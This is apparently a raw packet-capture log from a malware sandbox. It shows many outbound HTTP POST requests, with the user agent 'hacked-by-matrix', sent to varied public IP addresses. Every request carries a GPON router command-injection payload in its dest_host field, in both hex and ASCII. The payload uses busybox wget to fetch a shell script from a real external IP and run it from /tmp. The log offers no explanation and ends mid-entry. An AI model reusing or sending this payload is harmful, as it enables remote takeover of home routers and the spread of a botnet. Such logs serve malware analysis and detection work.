                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1861192.168.2.13479565.93.238.202443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821867943 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1862192.168.2.13515025.48.102.10443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821897030 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1863192.168.2.1352226109.77.28.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821907997 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1864192.168.2.1343250118.175.62.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821930885 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1865192.168.2.1349686118.209.10.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824492931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1866192.168.2.1352388118.182.61.112443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824542999 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1867192.168.2.133517242.255.151.68443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824544907 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1868192.168.2.1340960118.81.80.154443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824570894 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1869192.168.2.1336220109.176.201.184443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824584961 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1870192.168.2.135953642.233.110.95443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824630022 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1871192.168.2.1355912109.210.177.62443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824631929 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1872192.168.2.1350744109.3.134.182443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824687004 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1873192.168.2.1353750109.111.195.219443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824688911 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1874192.168.2.1351600109.148.229.195443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824716091 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1875192.168.2.1340474109.12.243.14443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824723005 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1876192.168.2.13555745.231.216.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824760914 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1877192.168.2.134734442.130.179.196443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824788094 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1878192.168.2.13471045.86.194.1443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824811935 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1879192.168.2.13569865.132.84.37443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824814081 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1880192.168.2.1351976212.223.174.86443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824889898 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1881192.168.2.134168042.97.233.238443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824889898 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1882192.168.2.1336566118.193.24.54443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824903965 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1883192.168.2.13601565.52.90.2443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824924946 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
